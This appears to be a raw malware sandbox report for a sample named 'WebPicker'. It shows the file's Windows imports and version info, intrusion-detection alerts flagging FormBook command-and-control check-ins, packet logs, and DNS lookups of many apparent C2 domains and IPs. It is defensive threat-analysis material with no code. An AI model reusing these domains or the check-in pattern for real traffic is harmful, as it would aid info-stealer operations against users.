                                                                                              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                              kernel32.dllSleep
                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                              ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                              oleaut32.dllGetErrorInfo, SysFreeString
                                                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                              wininet.dllInternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                              DescriptionData
                                                                                              LegalCopyrightLEVEUGLE Damien (c) 2005
                                                                                              InternalNameWebPicker
                                                                                              FileVersion1.0.0.0
                                                                                              CompanyNameLEVEUGLE Damien
                                                                                              LegalTrademarksLEVEUGLE Damien
                                                                                              CommentsEn Beta Test
                                                                                              ProductNameWebPicker
                                                                                              ProductVersion1.0.0.0
                                                                                              FileDescriptionTelechargeur de ressources Web
                                                                                              OriginalFilenameWebPicker
                                                                                              Translation0x040c 0x04e4
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              FrenchFrance
                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              01/28/22-19:04:09.307096TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.3198.54.117.215
                                                                                              01/28/22-19:04:09.307096TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.3198.54.117.215
                                                                                              01/28/22-19:04:09.307096TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.3198.54.117.215
                                                                                              01/28/22-19:04:14.697246TCP1201ATTACK-RESPONSES 403 Forbidden804980534.102.136.180192.168.2.3
                                                                                              01/28/22-19:04:19.754840TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3192.0.78.240
                                                                                              01/28/22-19:04:19.754840TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3192.0.78.240
                                                                                              01/28/22-19:04:19.754840TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3192.0.78.240
                                                                                              01/28/22-19:04:34.931897TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.3157.90.247.57
                                                                                              01/28/22-19:04:34.931897TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.3157.90.247.57
                                                                                              01/28/22-19:04:34.931897TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981880192.168.2.3157.90.247.57
                                                                                              01/28/22-19:04:40.328287TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3206.188.193.90
                                                                                              01/28/22-19:04:40.328287TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3206.188.193.90
                                                                                              01/28/22-19:04:40.328287TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.3206.188.193.90
                                                                                              01/28/22-19:05:16.408212TCP1201ATTACK-RESPONSES 403 Forbidden804982123.227.38.74192.168.2.3
                                                                                              01/28/22-19:05:33.729600TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.3162.0.214.189
                                                                                              01/28/22-19:05:33.729600TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.3162.0.214.189
                                                                                              01/28/22-19:05:33.729600TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.3162.0.214.189
                                                                                              01/28/22-19:05:55.428939TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982680192.168.2.352.89.53.122
                                                                                              01/28/22-19:05:55.428939TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982680192.168.2.352.89.53.122
                                                                                              01/28/22-19:05:55.428939TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982680192.168.2.352.89.53.122
                                                                                              01/28/22-19:06:00.877372TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.3162.0.214.189
                                                                                              01/28/22-19:06:00.877372TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.3162.0.214.189
                                                                                              01/28/22-19:06:00.877372TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.3162.0.214.189
                                                                                              01/28/22-19:06:17.792163TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983380192.168.2.334.102.136.180
                                                                                              01/28/22-19:06:17.792163TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983380192.168.2.334.102.136.180
                                                                                              01/28/22-19:06:17.792163TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983380192.168.2.334.102.136.180
                                                                                              01/28/22-19:06:17.906837TCP1201ATTACK-RESPONSES 403 Forbidden804983334.102.136.180192.168.2.3
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 28, 2022 19:02:08.379336119 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:08.379389048 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:08.379489899 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:08.653529882 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:08.653553009 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:08.707000017 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:08.707125902 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.090533018 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.090562105 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.090923071 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.091002941 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.095654011 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.137871027 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154026985 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154112101 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154136896 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154196978 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154201031 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154217005 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154239893 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154283047 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154350996 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154402971 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154414892 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154448986 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154455900 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154470921 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154490948 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154536963 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154556036 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154568911 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154597044 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154608965 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154613018 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154627085 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154665947 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154676914 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154719114 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154723883 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154733896 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154793978 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154798985 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154802084 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154818058 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154860973 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154886007 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154908895 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154920101 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154939890 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154967070 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.154978037 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.154989958 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155023098 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155040026 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155077934 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155101061 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155112028 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155123949 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155159950 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155179977 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155189991 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155230999 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155256033 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155267000 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155298948 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155323982 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155653000 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155750990 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.155762911 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.155806065 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.158747911 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.158854961 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.158896923 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.158899069 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.158902884 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.158911943 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.158936024 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.158966064 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.158979893 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159025908 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159027100 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159038067 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159063101 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159097910 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159101963 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159113884 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159137964 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159159899 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159169912 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159183979 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159205914 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159230947 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159231901 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159245968 CET44349743162.159.134.233192.168.2.3
                                                                                              Jan 28, 2022 19:02:09.159282923 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159313917 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159492970 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.159523010 CET49743443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.272641897 CET49744443192.168.2.3162.159.134.233
                                                                                              Jan 28, 2022 19:02:09.272686958 CET44349744162.159.134.233192.168.2.3
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 28, 2022 19:02:08.336565971 CET5745953192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:02:08.357199907 CET53574598.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:02:46.095660925 CET5415453192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:02:46.118274927 CET53541548.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:02:55.580161095 CET5391053192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:02:55.598773956 CET53539108.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:03:57.612617970 CET5623653192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:03:58.065099001 CET53562368.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:03.723891020 CET5652753192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:03.745421886 CET53565278.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:09.115576029 CET4955953192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:09.138079882 CET53495598.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:14.515635014 CET5265053192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:14.563252926 CET53526508.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:19.712559938 CET6329753192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:19.737186909 CET53632978.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:34.880911112 CET5836153192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:34.908684969 CET53583618.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:40.082042933 CET5361553192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:40.205960989 CET53536158.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:45.457892895 CET5072853192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:45.478863001 CET53507288.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:50.527867079 CET5377753192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:50.577311039 CET53537778.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:04:55.597968102 CET5710653192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:04:55.705581903 CET53571068.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:01.087110043 CET6035253192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:01.108038902 CET53603528.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:06.221638918 CET5677353192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:06.246817112 CET53567738.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:11.257445097 CET6098253192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:11.289930105 CET53609828.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:16.303420067 CET5805853192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:16.324215889 CET53580588.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:21.455590963 CET6436753192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:21.825874090 CET53643678.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:33.539577007 CET5153953192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:33.562211990 CET53515398.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:39.014292002 CET5539353192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:39.277076960 CET53553938.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:44.291393995 CET5058553192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:44.312463045 CET53505858.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:49.386869907 CET6345653192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:49.411113977 CET53634568.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:05:54.814265966 CET5854053192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:05:55.237948895 CET53585408.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:06:00.638150930 CET5510853192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:06:00.660510063 CET53551088.8.8.8192.168.2.3
                                                                                              Jan 28, 2022 19:06:11.855142117 CET5894253192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:06:17.697256088 CET6443253192.168.2.38.8.8.8
                                                                                              Jan 28, 2022 19:06:17.718286991 CET53644328.8.8.8192.168.2.3
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Jan 28, 2022 19:02:08.336565971 CET192.168.2.38.8.8.80xa75Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.095660925 CET192.168.2.38.8.8.80xe3abStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.580161095 CET192.168.2.38.8.8.80x864cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:57.612617970 CET192.168.2.38.8.8.80x45feStandard query (0)www.handejqr.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:03.723891020 CET192.168.2.38.8.8.80x536aStandard query (0)www.game2plays.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.115576029 CET192.168.2.38.8.8.80x267aStandard query (0)www.the-pumps.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:14.515635014 CET192.168.2.38.8.8.80xb622Standard query (0)www.bendyourtongue.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:19.712559938 CET192.168.2.38.8.8.80xa31Standard query (0)www.librairie-adrienne.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:34.880911112 CET192.168.2.38.8.8.80x4294Standard query (0)www.alifdanismanlik.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:40.082042933 CET192.168.2.38.8.8.80x7893Standard query (0)www.anniebapartments.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:45.457892895 CET192.168.2.38.8.8.80x3cbdStandard query (0)www.protection-onepa.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:50.527867079 CET192.168.2.38.8.8.80x5f7dStandard query (0)www.kreativevisibility.netA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:55.597968102 CET192.168.2.38.8.8.80xc090Standard query (0)www.20dzwww.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:01.087110043 CET192.168.2.38.8.8.80x64afStandard query (0)www.byausorsm26-plala.xyzA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:06.221638918 CET192.168.2.38.8.8.80xcdc2Standard query (0)www.alert78.infoA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:11.257445097 CET192.168.2.38.8.8.80x1c13Standard query (0)www.fabio.toolsA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:16.303420067 CET192.168.2.38.8.8.80xd71aStandard query (0)www.rematedeldia.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:21.455590963 CET192.168.2.38.8.8.80xea48Standard query (0)www.t1uba.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:33.539577007 CET192.168.2.38.8.8.80xef99Standard query (0)www.bubu3cin.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:39.014292002 CET192.168.2.38.8.8.80x37fcStandard query (0)www.awp.emailA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:44.291393995 CET192.168.2.38.8.8.80x4095Standard query (0)www.bestpleasure4u.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.386869907 CET192.168.2.38.8.8.80x6004Standard query (0)www.cielotherepy.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:54.814265966 CET192.168.2.38.8.8.80x8842Standard query (0)www.pkem.topA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:00.638150930 CET192.168.2.38.8.8.80x7bb3Standard query (0)www.bubu3cin.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.855142117 CET192.168.2.38.8.8.80x5334Standard query (0)www.ahmadfaizlajis.comA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:17.697256088 CET192.168.2.38.8.8.80x6d66Standard query (0)www.mehfeels.comA (IP address)IN (0x0001)
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Jan 28, 2022 19:02:08.357199907 CET8.8.8.8192.168.2.30xa75No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:08.357199907 CET8.8.8.8192.168.2.30xa75No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:08.357199907 CET8.8.8.8192.168.2.30xa75No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:08.357199907 CET8.8.8.8192.168.2.30xa75No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:08.357199907 CET8.8.8.8192.168.2.30xa75No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.118274927 CET8.8.8.8192.168.2.30xe3abNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.118274927 CET8.8.8.8192.168.2.30xe3abNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.118274927 CET8.8.8.8192.168.2.30xe3abNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.118274927 CET8.8.8.8192.168.2.30xe3abNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:46.118274927 CET8.8.8.8192.168.2.30xe3abNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.598773956 CET8.8.8.8192.168.2.30x864cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.598773956 CET8.8.8.8192.168.2.30x864cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.598773956 CET8.8.8.8192.168.2.30x864cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.598773956 CET8.8.8.8192.168.2.30x864cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:02:55.598773956 CET8.8.8.8192.168.2.30x864cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:58.065099001 CET8.8.8.8192.168.2.30x45feNo error (0)www.handejqr.comdejqr.v1442.d20140093.zhanh.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:58.065099001 CET8.8.8.8192.168.2.30x45feNo error (0)dejqr.v1442.d20140093.zhanh.comv1442.d20140093.zhanh.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:58.065099001 CET8.8.8.8192.168.2.30x45feNo error (0)v1442.d20140093.zhanh.coms18.zhanh.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:58.065099001 CET8.8.8.8192.168.2.30x45feNo error (0)s18.zhanh.comdns.zhanh.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:03:58.065099001 CET8.8.8.8192.168.2.30x45feNo error (0)dns.zhanh.com119.28.141.142A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:03.745421886 CET8.8.8.8192.168.2.30x536aNo error (0)www.game2plays.comgame2plays.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:03.745421886 CET8.8.8.8192.168.2.30x536aNo error (0)game2plays.com162.0.232.169A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)www.the-pumps.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
